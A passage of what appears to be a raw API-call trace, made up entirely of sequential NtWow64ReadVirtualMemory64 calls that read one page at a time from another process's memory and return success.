NumberOfBytesRead=0x1000) returned 0x0 [0076.679] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3fd000, Buffer=0x7ff8, BufferSize=0x25fd000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.679] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3fe000, Buffer=0x7ff8, BufferSize=0x25fe000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.679] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3ff000, Buffer=0x7ff8, BufferSize=0x25ff000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.679] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee400000, Buffer=0x7ff8, BufferSize=0x2600000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.679] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee401000, Buffer=0x7ff8, BufferSize=0x2601000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.679] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee402000, Buffer=0x7ff8, BufferSize=0x2602000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.679] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee403000, Buffer=0x7ff8, BufferSize=0x2603000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.680] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee404000, Buffer=0x7ff8, BufferSize=0x2604000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.680] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee405000, Buffer=0x7ff8, BufferSize=0x2605000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.680] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee406000, Buffer=0x7ff8, BufferSize=0x2606000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.680] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee407000, Buffer=0x7ff8, BufferSize=0x2607000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.680] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee408000, Buffer=0x7ff8, BufferSize=0x2608000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.680] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee409000, Buffer=0x7ff8, BufferSize=0x2609000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.680] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee40a000, Buffer=0x7ff8, BufferSize=0x260a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.681] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee40b000, Buffer=0x7ff8, BufferSize=0x260b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.681] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee40c000, Buffer=0x7ff8, BufferSize=0x260c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.681] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee40d000, Buffer=0x7ff8, BufferSize=0x260d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.681] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee40e000, Buffer=0x7ff8, BufferSize=0x260e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.681] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee40f000, Buffer=0x7ff8, BufferSize=0x260f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.681] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee410000, Buffer=0x7ff8, BufferSize=0x2610000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.681] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee411000, Buffer=0x7ff8, BufferSize=0x2611000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.681] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee412000, Buffer=0x7ff8, BufferSize=0x2612000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.682] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee413000, Buffer=0x7ff8, BufferSize=0x2613000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.682] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee414000, Buffer=0x7ff8, BufferSize=0x2614000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.682] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee415000, Buffer=0x7ff8, BufferSize=0x2615000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.682] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee416000, Buffer=0x7ff8, BufferSize=0x2616000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.682] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee417000, Buffer=0x7ff8, BufferSize=0x2617000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.683] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee418000, Buffer=0x7ff8, BufferSize=0x2618000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.683] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee419000, Buffer=0x7ff8, BufferSize=0x2619000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.683] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee41a000, Buffer=0x7ff8, BufferSize=0x261a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.683] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee41b000, Buffer=0x7ff8, BufferSize=0x261b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.683] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee41c000, Buffer=0x7ff8, BufferSize=0x261c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.684] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee41d000, Buffer=0x7ff8, BufferSize=0x261d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.684] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee41e000, Buffer=0x7ff8, BufferSize=0x261e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.684] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee41f000, Buffer=0x7ff8, BufferSize=0x261f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.684] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee420000, Buffer=0x7ff8, BufferSize=0x2620000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.684] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee421000, Buffer=0x7ff8, BufferSize=0x2621000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.684] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee422000, Buffer=0x7ff8, BufferSize=0x2622000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.684] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee423000, Buffer=0x7ff8, BufferSize=0x2623000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.685] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee424000, Buffer=0x7ff8, BufferSize=0x2624000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.685] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee425000, Buffer=0x7ff8, BufferSize=0x2625000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.685] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee426000, Buffer=0x7ff8, BufferSize=0x2626000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.685] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee427000, Buffer=0x7ff8, BufferSize=0x2627000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.685] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee428000, Buffer=0x7ff8, BufferSize=0x2628000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.685] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee429000, Buffer=0x7ff8, BufferSize=0x2629000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.685] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee42a000, Buffer=0x7ff8, BufferSize=0x262a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.686] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee42b000, Buffer=0x7ff8, BufferSize=0x262b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.686] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee42c000, Buffer=0x7ff8, BufferSize=0x262c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.686] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee42d000, Buffer=0x7ff8, BufferSize=0x262d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.686] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee42e000, Buffer=0x7ff8, BufferSize=0x262e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.686] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee42f000, Buffer=0x7ff8, BufferSize=0x262f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.686] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee430000, Buffer=0x7ff8, BufferSize=0x2630000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.686] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee431000, Buffer=0x7ff8, BufferSize=0x2631000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.686] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee432000, Buffer=0x7ff8, BufferSize=0x2632000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.687] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee433000, Buffer=0x7ff8, BufferSize=0x2633000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.687] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee434000, Buffer=0x7ff8, BufferSize=0x2634000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.687] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee435000, Buffer=0x7ff8, BufferSize=0x2635000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.687] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee436000, Buffer=0x7ff8, BufferSize=0x2636000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.687] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee437000, Buffer=0x7ff8, BufferSize=0x2637000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.687] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee438000, Buffer=0x7ff8, BufferSize=0x2638000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.687] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee439000, Buffer=0x7ff8, BufferSize=0x2639000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.688] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee43a000, Buffer=0x7ff8, BufferSize=0x263a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.688] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee43b000, Buffer=0x7ff8, BufferSize=0x263b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.688] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee43c000, Buffer=0x7ff8, BufferSize=0x263c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.688] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee43d000, Buffer=0x7ff8, BufferSize=0x263d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.688] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee43e000, Buffer=0x7ff8, BufferSize=0x263e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.688] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee43f000, Buffer=0x7ff8, BufferSize=0x263f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.688] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee440000, Buffer=0x7ff8, BufferSize=0x2640000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.689] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee441000, Buffer=0x7ff8, BufferSize=0x2641000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.689] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee442000, Buffer=0x7ff8, BufferSize=0x2642000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.689] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee443000, Buffer=0x7ff8, BufferSize=0x2643000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.689] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee444000, Buffer=0x7ff8, BufferSize=0x2644000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.689] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee445000, Buffer=0x7ff8, BufferSize=0x2645000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.689] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee446000, Buffer=0x7ff8, BufferSize=0x2646000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.689] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee447000, Buffer=0x7ff8, BufferSize=0x2647000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.690] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee448000, Buffer=0x7ff8, BufferSize=0x2648000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.690] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee449000, Buffer=0x7ff8, BufferSize=0x2649000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.690] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee44a000, Buffer=0x7ff8, BufferSize=0x264a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.690] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee44b000, Buffer=0x7ff8, BufferSize=0x264b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.690] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee44c000, Buffer=0x7ff8, BufferSize=0x264c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.690] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee44d000, Buffer=0x7ff8, BufferSize=0x264d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.690] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee44e000, Buffer=0x7ff8, BufferSize=0x264e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.691] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee44f000, Buffer=0x7ff8, BufferSize=0x264f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.691] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee450000, Buffer=0x7ff8, BufferSize=0x2650000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.691] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee451000, Buffer=0x7ff8, BufferSize=0x2651000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.691] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee452000, Buffer=0x7ff8, BufferSize=0x2652000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.691] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee453000, Buffer=0x7ff8, BufferSize=0x2653000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.691] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee454000, Buffer=0x7ff8, BufferSize=0x2654000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.691] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee455000, Buffer=0x7ff8, BufferSize=0x2655000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.692] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee456000, Buffer=0x7ff8, BufferSize=0x2656000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.692] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee457000, Buffer=0x7ff8, BufferSize=0x2657000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.692] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee458000, Buffer=0x7ff8, BufferSize=0x2658000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.692] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee459000, Buffer=0x7ff8, BufferSize=0x2659000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.692] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee45a000, Buffer=0x7ff8, BufferSize=0x265a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.692] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee45b000, Buffer=0x7ff8, BufferSize=0x265b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.692] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee45c000, Buffer=0x7ff8, BufferSize=0x265c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.693] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee45d000, Buffer=0x7ff8, BufferSize=0x265d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.693] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee45e000, Buffer=0x7ff8, BufferSize=0x265e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.693] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee45f000, Buffer=0x7ff8, BufferSize=0x265f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.693] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee460000, Buffer=0x7ff8, BufferSize=0x2660000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.693] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee461000, Buffer=0x7ff8, BufferSize=0x2661000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.693] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee462000, Buffer=0x7ff8, BufferSize=0x2662000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.693] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee463000, Buffer=0x7ff8, BufferSize=0x2663000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.693] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee464000, Buffer=0x7ff8, BufferSize=0x2664000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.694] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee465000, Buffer=0x7ff8, BufferSize=0x2665000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.694] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee466000, Buffer=0x7ff8, BufferSize=0x2666000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.694] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee467000, Buffer=0x7ff8, BufferSize=0x2667000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.694] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee468000, Buffer=0x7ff8, BufferSize=0x2668000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.694] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee469000, Buffer=0x7ff8, BufferSize=0x2669000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.694] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee46a000, Buffer=0x7ff8, BufferSize=0x266a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.694] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee46b000, Buffer=0x7ff8, BufferSize=0x266b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.695] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee46c000, Buffer=0x7ff8, BufferSize=0x266c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.695] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee46d000, Buffer=0x7ff8, BufferSize=0x266d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.695] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee46e000, Buffer=0x7ff8, BufferSize=0x266e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, 